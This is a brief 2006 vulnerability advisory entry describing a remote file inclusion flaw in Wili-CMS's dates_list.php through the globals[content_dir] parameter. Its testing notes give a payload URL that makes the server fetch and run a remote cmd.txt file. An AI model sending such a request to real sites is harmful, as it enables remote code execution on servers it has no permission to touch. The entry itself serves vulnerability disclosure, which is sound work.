Wili-CMS example-view/templates/dates_list.php globals[content_dir] Variable Remote File Inclusion

2006-09-21T19:57:21
ID OSVDB:32300
Type osvdb
Reporter OSVDB
Modified 2006-09-21T19:57:21

Description

Manual Testing Notes

/example-view/templates/dates_list.php?globals[content_dir]=http://[target]/cmd.txt?

References:

Related OSVDB ID: 32298 Related OSVDB ID: 32291 Related OSVDB ID: 32296 Related OSVDB ID: 32299 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0340.html CVE-2006-4987 Bugtraq ID: 20134